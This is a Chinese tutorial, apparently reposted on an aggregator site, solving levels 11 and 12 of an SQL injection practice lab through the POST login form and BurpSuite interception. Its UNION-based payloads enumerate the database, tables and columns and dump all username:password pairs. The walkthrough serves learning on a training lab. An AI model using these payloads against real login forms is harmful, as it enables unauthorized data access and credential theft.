当前位置: 首页 > article >正文

【sql靶场】第11、12关-post提交注入

目录

【sql靶场】第11、12关-post提交注入

POST

一、URL

二、核心组成部分

三、数据编码规范

四、应用场景与请求方法

第十一关

方法一

步骤一

步骤二

步骤三

步骤四

步骤五

步骤六

步骤七

方法二

步骤一

步骤二

步骤三

步骤四

步骤五

步骤六

步骤七

第十二关


【sql靶场】第11、12关-post提交注入

POST

关卡讲解前小知识,不看可以跳过

一、URL

URL(Uniform Resource Locator)是互联网上唯一标识资源位置的字符串,包含协议、主机地址、路径等核心部分,用于定位和访问网络资源‌12。其标准格式为: 协议://主机地址[:端口号]/路径?查询参数#锚点 https://www.example.com:8080/api/users?id=123#section1

二、核心组成部分

‌协议(Scheme)‌,定义资源访问的通信协议,例如:

http:超文本传输协议(明文传输)‌ https:加密的HTTP协议(安全性更高)‌ ftp:文件传输协议

主机地址(Host)

域名:如 www.example.com IP地址:如 202.108.22.5

端口号:可选,默认HTTP为80,HTTPS为443,自定义端口需显式指定(如:8080)‌

‌路径(Path): 表示服务器上的资源路径,如 /api/users/img/logo.png‌12。

‌查询参数(Query Parameters):以 ? 开头,key=value 形式通过 & 分隔,用于向服务器传递附加参数,如 ?name=John&age=30。

‌锚点(Fragment)以 # 开头,用于页面内导航(如 #section1),仅客户端使用,不发送至服务器‌。

三、数据编码规范

URL中非ASCII字符(如中文、空格)需进行‌URL编码

规则如下:将字符转换为十六进制值,前缀加 %(如空格 → %20/%2F)‌,编码方式由浏览器或编程语言决定,可通过 encodeURIComponent() 等函数统一处理‌。

示例*: https://example.com/search?q=%E4%B8%AD%E6%96%87(搜索“中文”)

四、应用场景与请求方法

GET请求

数据通过URL参数传递,明文暴露于地址栏,适用于非敏感数据(如搜索关键词)‌。

受URL长度限制(通常≤2048字符)‌。

POST请求

数据通过请求体传输,URL中仅包含资源路径(如 https://example.com/login)‌。

适合提交敏感信息(如密码)或大量数据(如文件上传)‌

第十一关

这一关提交方式从get变成了post,使得数据不会通过URL参数传递,明文暴露于地址栏,所以使用post提交POST请求的数据存储在‌请求体(Body)‌中,而非URL参数,URL中仅包含资源路径,这里就不需要再地址栏进行测试,但是我们可以在页面的账号密码输入里尝试,可不可以进行注入

学习阶段尝试注入方法有

方法一:直接在页面的账号密码输入框里面进行注入

方法二:使用BurpSuite进行拦截注入

方法一
步骤一

在账号或者密码输入框中进行测试单引号闭合

1'

发现账号密码的输入框都可以进行注入

步骤二

进行测试列数

1' order by 5 #

1' order by 3 #

1' order by 2 #

4-测试列数3

最后测试出来列数为二

步骤三

知道了列数,进行测试回显

1' union select 1,2 #

测试出来账号回显为1,密码为2

步骤四

进行注入数据库名

1' union select 1,database() #

步骤五

注入表名

1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#

步骤六

注入字段名

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users')#

步骤七

注入账号密码

1' union select  1,(select group_concat(concat_ws(0x3a,username,password)) from users)#

方法二
步骤一

打开BurpSuite,点击代理然后点击截断的截断请求,然后打开火狐浏览器,打开关卡页面,随便输入账号密码,点击提交

步骤二

进行测试列数

1' order by 5 #

1' order by 3 #

1' order by 2 #

最后测试出来列数为二

步骤三

知道了列数,进行测试回显

1' union select 1,2 #

测试出来账号回显为1,密码为2

步骤四

进行注入数据库名

1' union select 1,database() #

步骤五

注入表名

1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#

15-注入表名

步骤六

注入字段名

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users')#

步骤七

注入账号密码

1' union select  1,group_concat(concat_ws(0x3a,username,password)) from users#

17-注入账号密码

方法一与方法二差不多,看个人喜欢,而且单单从sql靶场这几个关卡来看,post提交这里的sql关卡和前面的get提交差不多,只是将从地址栏注入变成了输入框或者拦截注入

其实还有一个方式可以注入,就是利用软件工具等等进行漏洞扫描注入

第十二关

与第十一关基本一样,只是闭合方式变成了"


http://www.kler.cn/a/585720.html

相关文章:

  • 使用GitHub Actions实现Git推送自动部署到服务器
  • Python实现邮件发送功能,邮箱验证码发送(详细功能实现及环境搭建)
  • 【学习笔记】LLM技术基础
  • C++相关基础概念之入门讲解(上)
  • Qt QML实现弹球消砖块小游戏
  • WPF中查看PDF文件之MoonPdfLib类库
  • c++ auto关键字皮毛
  • ACL初级总结
  • 人工智能时代教育行业该如何转型:迎接挑战,塑造未来教育生态
  • 揭秘AI:机器学习与深度学习的奥秘
  • 浅谈数据分析及数据思维
  • SSM企业台账管理平台
  • NodeJS接口
  • DB-GPT-0.7版本win11安装,最新版本,安装方式变更了
  • Microsoft Excel 2024 LTSC mac v16.95 表格处理软件 支持M、Intel芯片
  • Java入职篇(1)——心态篇
  • jvm汇总
  • 基于相量测量单元(PMU)的电力系统故障分析MATLAB仿真
  • linux常用基本指令汇总
  • 散货拼柜业务痛点有哪些?货代公司如何通过散拼系统提高效率?